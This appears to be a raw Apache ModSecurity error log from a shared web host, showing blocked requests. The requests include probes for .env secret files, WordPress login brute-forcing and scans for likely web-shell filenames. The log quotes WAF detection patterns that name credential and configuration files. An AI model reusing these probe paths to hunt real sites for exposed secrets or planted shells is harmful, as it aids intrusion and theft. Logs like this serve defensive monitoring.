[Tue May 26 14:50:35.759714 2026] [security2:error] [pid 648203:tid 648352] [client 195.178.110.34:38974] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/development/.env"] [unique_id "ahVl47EQDDtxJNiDrdT41gAAAJg"]
[Tue May 26 14:50:35.963988 2026] [security2:error] [pid 648203:tid 648390] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl47EQDDtxJNiDrdT41QAAAL4"]
[Tue May 26 14:50:35.964337 2026] [security2:error] [pid 648203:tid 648323] [remote 45.79.189.31:44700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVl47EQDDtxJNiDrdT41wAA-nc"]
[Tue May 26 14:50:36.981046 2026] [security2:error] [pid 648203:tid 648322] [remote 84.247.181.196:58902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVl5LEQDDtxJNiDrdT48AAA8nY"]
[Tue May 26 14:50:38.244877 2026] [security2:error] [pid 648203:tid 648357] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl5bEQDDtxJNiDrdT5GAAAAJ0"]
[Tue May 26 14:50:40.507595 2026] [security2:error] [pid 648203:tid 648394] [client 114.119.129.237:64373] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.krishnawoodworks.com"] [uri "/lander"] [unique_id "ahVl6LEQDDtxJNiDrdT5WwAAAMI"], referer: https://www.krishnawoodworks.com/lander
[Tue May 26 14:50:40.603918 2026] [security2:error] [pid 648203:tid 648428] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl6LEQDDtxJNiDrdT5VAAAAOQ"]
[Tue May 26 14:50:42.663439 2026] [security2:error] [pid 648203:tid 648435] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl6rEQDDtxJNiDrdT5lAAAAOs"]
[Tue May 26 14:50:43.393583 2026] [autoindex:error] [pid 648203:tid 648406] [client 43.134.92.251:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://gldmarsa.com
[Tue May 26 14:50:45.071394 2026] [security2:error] [pid 648203:tid 648411] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl7LEQDDtxJNiDrdT54gAAANM"]
[Tue May 26 14:50:47.169554 2026] [security2:error] [pid 648203:tid 648427] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl7rEQDDtxJNiDrdT6IwAAAOM"]
[Tue May 26 14:50:47.306032 2026] [security2:error] [pid 648203:tid 648446] [client 2.57.122.173:30100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/secrets/.env"] [unique_id "ahVl77EQDDtxJNiDrdT6NgAAAPY"]
[Tue May 26 14:50:47.319004 2026] [security2:error] [pid 648203:tid 648338] [client 2.57.122.173:30096] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVl77EQDDtxJNiDrdT6NwAAAIo"]
[Tue May 26 14:50:47.502320 2026] [security2:error] [pid 648203:tid 648395] [client 195.178.110.34:50108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVl77EQDDtxJNiDrdT6PgAAAMM"]
[Tue May 26 14:50:47.691148 2026] [security2:error] [pid 648203:tid 648409] [client 2.57.122.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVl77EQDDtxJNiDrdT6MAAAANE"]
[Tue May 26 14:50:47.695312 2026] [security2:error] [pid 648203:tid 648457] [client 2.57.122.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVl77EQDDtxJNiDrdT6LgAAAQE"]
[Tue May 26 14:50:47.786550 2026] [security2:error] [pid 648203:tid 648214] [remote 103.11.102.106:39748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVl77EQDDtxJNiDrdT6RQAA4go"]
[Tue May 26 14:50:48.528789 2026] [security2:error] [pid 648203:tid 648359] [client 47.128.48.20:49008] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVl8LEQDDtxJNiDrdT6UwAAAJ8"]
[Tue May 26 14:50:49.378232 2026] [security2:error] [pid 648203:tid 648385] [client 2.57.122.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVl8bEQDDtxJNiDrdT6dQAAALk"]
[Tue May 26 14:50:49.709879 2026] [security2:error] [pid 648203:tid 648447] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl8bEQDDtxJNiDrdT6cgAAAPc"]
[Tue May 26 14:50:51.051180 2026] [security2:error] [pid 648203:tid 648460] [client 196.115.35.185:41895] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env"] [unique_id "ahVl87EQDDtxJNiDrdT6nAAAAQQ"]
[Tue May 26 14:50:51.360405 2026] [security2:error] [pid 648203:tid 648366] [client 2.57.122.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVl87EQDDtxJNiDrdT6qwAAAKY"]
[Tue May 26 14:50:51.518976 2026] [security2:error] [pid 648203:tid 648446] [client 20.206.111.203:29397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVl87EQDDtxJNiDrdT6sAAAAPY"]
[Tue May 26 14:50:51.519134 2026] [security2:error] [pid 648203:tid 648446] [client 20.206.111.203:29397] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVl87EQDDtxJNiDrdT6sAAAAPY"]
[Tue May 26 14:50:51.692062 2026] [security2:error] [pid 648203:tid 648401] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl87EQDDtxJNiDrdT6pQAAAMk"]
[Tue May 26 14:50:52.366718 2026] [security2:error] [pid 648203:tid 648388] [client 195.178.110.34:50120] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVl9LEQDDtxJNiDrdT6wgAAALw"]
[Tue May 26 14:50:53.362839 2026] [security2:error] [pid 648203:tid 648354] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl9LEQDDtxJNiDrdT6zgAAAJo"]
[Tue May 26 14:50:54.051132 2026] [security2:error] [pid 648203:tid 648451] [client 20.206.111.203:62596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/x.php"] [unique_id "ahVl9rEQDDtxJNiDrdT6-gAAAPs"]
[Tue May 26 14:50:54.051285 2026] [security2:error] [pid 648203:tid 648451] [client 20.206.111.203:62596] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/x.php"] [unique_id "ahVl9rEQDDtxJNiDrdT6-gAAAPs"]
[Tue May 26 14:50:54.562323 2026] [autoindex:error] [pid 648203:tid 648333] [client 68.4.209.151:52397] AH01276: Cannot serve directory /home1/midrie34/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:50:55.165790 2026] [security2:error] [pid 648203:tid 648280] [remote 95.216.117.13:58752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVl9rEQDDtxJNiDrdT7HQAAq0w"]
[Tue May 26 14:50:55.381533 2026] [security2:error] [pid 648203:tid 648373] [client 20.206.111.203:62179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/201.php"] [unique_id "ahVl97EQDDtxJNiDrdT7JQAAAK0"]
[Tue May 26 14:50:55.381693 2026] [security2:error] [pid 648203:tid 648373] [client 20.206.111.203:62179] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/201.php"] [unique_id "ahVl97EQDDtxJNiDrdT7JQAAAK0"]
[Tue May 26 14:50:56.562141 2026] [security2:error] [pid 648203:tid 648442] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl-LEQDDtxJNiDrdT7PQAAAPI"]
[Tue May 26 14:50:57.863902 2026] [security2:error] [pid 648203:tid 648418] [client 20.206.111.203:62171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/ops.php"] [unique_id "ahVl-bEQDDtxJNiDrdT7VwAAANo"]
[Tue May 26 14:50:57.864034 2026] [security2:error] [pid 648203:tid 648418] [client 20.206.111.203:62171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/ops.php"] [unique_id "ahVl-bEQDDtxJNiDrdT7VwAAANo"]
[Tue May 26 14:50:58.106282 2026] [security2:error] [pid 648203:tid 648356] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl-bEQDDtxJNiDrdT7UQAAAJw"]
[Tue May 26 14:50:58.491988 2026] [security2:error] [pid 648203:tid 648408] [client 14.191.37.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl-rEQDDtxJNiDrdT7XQAAANA"]
[Tue May 26 14:50:58.511057 2026] [security2:error] [pid 648203:tid 648337] [client 89.124.112.117:64459] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "89.124.112.117" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "soto-plumbing.com"] [uri "/wp-comments-post.php"] [unique_id "ahVl-rEQDDtxJNiDrdT7agAAAIk"], referer: https://soto-plumbing.com/2024/03/04/hello-world/
[Tue May 26 14:50:58.511154 2026] [security2:error] [pid 648203:tid 648337] [client 89.124.112.117:64459] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "soto-plumbing.com"] [uri "/wp-comments-post.php"] [unique_id "ahVl-rEQDDtxJNiDrdT7agAAAIk"], referer: https://soto-plumbing.com/2024/03/04/hello-world/
[Tue May 26 14:50:59.568965 2026] [security2:error] [pid 648203:tid 648362] [client 20.206.111.203:29429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/samll.php"] [unique_id "ahVl-7EQDDtxJNiDrdT7ggAAAKI"]
[Tue May 26 14:50:59.569102 2026] [security2:error] [pid 648203:tid 648362] [client 20.206.111.203:29429] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/samll.php"] [unique_id "ahVl-7EQDDtxJNiDrdT7ggAAAKI"]
[Tue May 26 14:50:59.797234 2026] [security2:error] [pid 648203:tid 648373] [client 195.178.110.34:39176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVl-7EQDDtxJNiDrdT7hgAAAK0"]
[Tue May 26 14:50:59.994463 2026] [security2:error] [pid 648203:tid 648260] [remote 82.196.25.136:39946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVl-7EQDDtxJNiDrdT7hwAA6jg"]
[Tue May 26 14:51:00.118530 2026] [security2:error] [pid 648203:tid 648423] [client 94.158.244.245:53498] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "94.158.244.245" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "soto-plumbing.com"] [uri "/wp-comments-post.php"] [unique_id "ahVl_LEQDDtxJNiDrdT7kAAAAN8"], referer: https://soto-plumbing.com/2024/03/04/hello-world/
[Tue May 26 14:51:00.118704 2026] [security2:error] [pid 648203:tid 648423] [client 94.158.244.245:53498] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "soto-plumbing.com"] [uri "/wp-comments-post.php"] [unique_id "ahVl_LEQDDtxJNiDrdT7kAAAAN8"], referer: https://soto-plumbing.com/2024/03/04/hello-world/
[Tue May 26 14:51:00.650041 2026] [security2:error] [pid 648203:tid 648428] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl_LEQDDtxJNiDrdT7mQAAAOQ"]
[Tue May 26 14:51:01.280207 2026] [security2:error] [pid 648203:tid 648212] [remote 74.7.241.58:51524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVl_bEQDDtxJNiDrdT7xgAA9wg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:51:02.071839 2026] [security2:error] [pid 648203:tid 648343] [client 20.206.111.203:62551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/ingfo.php"] [unique_id "ahVl_rEQDDtxJNiDrdT73AAAAI8"]
[Tue May 26 14:51:02.071977 2026] [security2:error] [pid 648203:tid 648343] [client 20.206.111.203:62551] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/ingfo.php"] [unique_id "ahVl_rEQDDtxJNiDrdT73AAAAI8"]
[Tue May 26 14:51:02.215020 2026] [security2:error] [pid 648203:tid 648409] [client 114.119.128.127:45447] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVl_rEQDDtxJNiDrdT73wAAANE"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&page=6&product_id=150
[Tue May 26 14:51:03.062107 2026] [security2:error] [pid 648203:tid 648355] [client 20.206.111.203:62624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/c55cdler.php"] [unique_id "ahVl_7EQDDtxJNiDrdT7-wAAAJs"]
[Tue May 26 14:51:03.062239 2026] [security2:error] [pid 648203:tid 648355] [client 20.206.111.203:62624] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/c55cdler.php"] [unique_id "ahVl_7EQDDtxJNiDrdT7-wAAAJs"]
[Tue May 26 14:51:03.067965 2026] [security2:error] [pid 648203:tid 648405] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl_rEQDDtxJNiDrdT77wAAAM0"]
[Tue May 26 14:51:04.604821 2026] [security2:error] [pid 648203:tid 648387] [client 39.106.67.230:54904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.67.106.39.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ucdc.co.in"] [uri "/caches/log/Zmlcd.php"] [unique_id "ahVmALEQDDtxJNiDrdT8LQAAALs"]
[Tue May 26 14:51:04.651823 2026] [security2:error] [pid 648203:tid 648433] [client 20.206.111.203:29676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/error_log.php"] [unique_id "ahVmALEQDDtxJNiDrdT8NAAAAOk"]
[Tue May 26 14:51:04.651917 2026] [security2:error] [pid 648203:tid 648433] [client 20.206.111.203:29676] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/error_log.php"] [unique_id "ahVmALEQDDtxJNiDrdT8NAAAAOk"]
